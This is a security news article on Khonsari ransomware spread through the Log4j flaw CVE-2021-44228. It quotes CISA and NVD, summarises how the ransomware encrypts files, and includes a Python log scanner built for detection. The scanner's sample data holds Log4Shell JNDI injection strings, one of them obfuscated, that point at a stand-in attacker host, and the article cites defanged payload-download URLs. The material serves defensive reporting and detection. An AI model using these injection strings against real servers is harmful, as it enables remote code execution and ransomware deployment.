
CVE-2021-44228 Used by Attackers to Drop Khonsari Ransomware

Khonsari is a novel ransomware family currently attempting to exploit the critical Apache Log4j vulnerability, also known as CVE-2021-44228, Log4Shell and Logjam.

Apache Log4j Vulnerability: CVE-2021-44228

According to the National Vulnerability Database, “Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints.” In other words, a threat actor who can control the content of a logged message or parameter can make the application execute arbitrary code loaded from an attacker-controlled LDAP server. The only condition is that message lookup substitution is enabled.
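As an added illustration of the log-message lookup described above (example code written for this page, not from the article or from the researchers it cites), a small detector that collapses nested Log4j lookups and flags log lines carrying a `${jndi:...}` reference. The request log lines and the `attacker.example` host are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample request log lines (not from the article). The second and
# third carry a JNDI lookup in attacker-controlled fields (User-Agent, query
# string); the third wraps it in ${lower:...} so that a plain substring match
# for "jndi:" would miss it. The fourth uses a harmless lookup as a control.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:13:02:44 +0000] "GET /?x=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 404 "curl/7.68.0"',
    '10.0.0.8 - - [10/Dec/2021:13:03:10 +0000] "GET /?s=${date:yyyy} HTTP/1.1" 200 "Mozilla/5.0"',
]

# Innermost lookups that only rewrite their argument:
#   ${lower:j} -> j, ${upper:J} -> J, ${env:NOPE:-j} and ${::-j} -> j (default-value form).
_CASE_WRAPPER = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}', re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')
# A JNDI lookup and the scheme it points at (ldap, ldaps, rmi, dns, ...).
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:', re.IGNORECASE)


def flatten_lookups(s: str) -> str:
    """Repeatedly resolve inside-out wrappers until the string stops changing."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE_WRAPPER.sub(lambda m: m.group(1), s)   # drop lower/upper wrappers
        s = _DEFAULT_VALUE.sub(lambda m: m.group(1), s)  # keep the default branch
    return s


def find_jndi_lookups(line: str) -> List[str]:
    """Return the lower-cased schemes of every JNDI lookup in one log line."""
    return [m.group(1).lower() for m in _JNDI.finditer(flatten_lookups(line))]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """One finding per line that contains a JNDI lookup, with the schemes seen."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        schemes = find_jndi_lookups(line)
        if schemes:
            findings.append({"line": lineno, "schemes": schemes, "text": line})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: JNDI lookup via {', '.join(f['schemes'])}")
```

The flattening step matters: detection rules that only grep for the literal `jndi:` miss the wrapped form on the third sample line.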

Novel Khonsari Ransomware Family

Bitdefender researchers recently observed that attackers are exploiting the Log4j vulnerability to deliver malicious payloads, including the previously unknown Khonsari ransomware targeting Windows servers.

In another technical overview of Khonsari, Cado researchers say that “the exploit loads the Java bytecode at hxxp://3.145.115[.]94/Main.class via JNDI, which then downloads the Khonsari ransomware from hxxp://3.145.115[.]94/zambo/groenhuyzen.exe.”

The researchers were able to retrieve a sample of the ransomware and perform static and forensic analysis on it.

The ransomware is written in C# on the .NET framework, so its source code can be recovered in a straightforward way by decompiling it with tools such as ILSpy. Once decompiled, the source code reveals the malware’s capabilities:

“Khonsari is – frankly – a bit boring. It weighs in at only 12 KB and contains only the most basic functionality required to perform its ransomware objective. Its size and simplicity is also a strength however – at the time we ran the malware dynamically it wasn’t detected by the system’s built-in antivirus,” Cado researchers said.

Once executed, the ransomware enumerates all mounted drives apart from C:\ and encrypts all contents found on them. Encryption of the C:\ drive is more targeted: Khonsari goes after user directories, including Documents, Videos, Pictures, Downloads and Desktop. Each file is encrypted with AES-128 in CBC mode. Once encryption is finished, the .khonsari extension is appended to each encrypted file.

Khonsari Ransomware Using CVE-2021-44228

The ransomware is currently being delivered through the critical Apache bug. However, attacks based on this vulnerability are also downloading an additional malicious payload: the Orcus remote access trojan.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) disclosed the active exploitation of the flaw.

“CISA and its partners, through the Joint Cyber Defense Collaborative, are tracking and responding to active, widespread exploitation of a critical remote code execution vulnerability (CVE-2021-44228) affecting Apache Log4j software library versions 2.0-beta9 to 2.14.1. Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications—as well as in operational technology products—to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to take control of an affected system,” the CISA alert said.

Patching CVE-2021-44228 is strongly advised. CISA has published its Apache Log4j Vulnerability Guidance to help organizations address the critical issue.

In July 2021, the REvil ransomware gang carried out an unprecedented supply chain ransomware attack against customers of Kaseya’s VSA product. Those attacks exploited CVE-2021-30116, a zero-day vulnerability.

Milena Dimitrova
